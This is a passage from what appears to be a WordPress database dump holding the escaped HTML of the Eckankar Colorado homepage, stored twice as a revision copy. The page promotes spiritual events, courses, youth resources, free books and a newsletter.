rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236859,40265,'post_title','Home'),(236860,40265,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-h-200.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div 